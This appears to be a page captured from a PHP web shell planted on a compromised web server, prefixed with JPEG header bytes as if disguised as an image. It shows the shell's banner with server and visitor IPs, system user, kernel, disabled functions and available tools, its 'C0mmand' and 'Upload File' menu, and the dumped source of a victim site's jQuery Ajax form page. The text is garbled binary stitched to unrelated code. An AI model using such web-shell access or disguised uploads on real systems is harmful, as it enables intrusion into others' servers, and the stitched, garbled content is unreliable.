����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.139.87.151 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../../www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include "db.php"; include "header.php"; include "sidebar.php"; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>how to submit a form without refreshing the page using jquery ajax - Tutsmake.com</title> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet"> <script src="https://code.jquery.com/jquery-3.4.1.js"></script> </head> <body> <div class="container"> <div class="row"> <div class="col-lg-8 col-offset-2"> <div class="page-header"> <h2>jQuery Ajax Form Submit Example In PHP</h2> </div> <p>Please fill all fields in the form</p> <p id="show_message" style="display: none">Form data sent. Thanks for your comments.We will update you within 24 hours. </p> <span id="error" style="display: none"></span> <form action="javascript:void(0)" method="post" id="ajax-form"> <div class="form-group"> <label>Name</label> <input type="text" name="name" id="name" class="form-control" value="" maxlength="50" > </div> <div class="form-group "> <label>Email</label> <input type="email" name="email" id="email" class="form-control" value="" maxlength="30" > </div> <div class="form-group"> <label>Mobile</label> <input type="text" name="mobile" id="mobile" class="form-control" value="" maxlength="12" > </div> <input type="submit" class="btn btn-primary" name="submit" value="submit"> </form> </div> </div> </div> <script type="text/javascript"> $(document).ready(function($){ // hide messages $("#error").hide(); $("#show_message").hide(); // on submit... $('#ajax-form').submit(function(e){ e.preventDefault(); $("#error").hide(); //name required var name = $("input#name").val(); if(name == ""){ $("#error").fadeIn().text("Name required."); $("input#name").focus(); return false; } // email required var email = $("input#email").val(); if(email == ""){ $("#error").fadeIn().text("Email required"); $("input#email").focus(); return false; } // mobile number required var height = $("input#height").val(); if(height == ""){ $("#error").fadeIn().text("Mobile number required"); $("input#height").focus(); return false; } // ajax $.ajax({ type:"POST", url: "ajax-form-save.php", data: $(this).serialize(), // get all form field value in serialize form success: function(){ $("#show_message").fadeIn(); //$("#ajax-form").fadeOut(); //success: function myFunction(){ //alert('form was submitted'); } }); }); return false; }); </script> </body> </html> <?php include('footer.php') ; ?>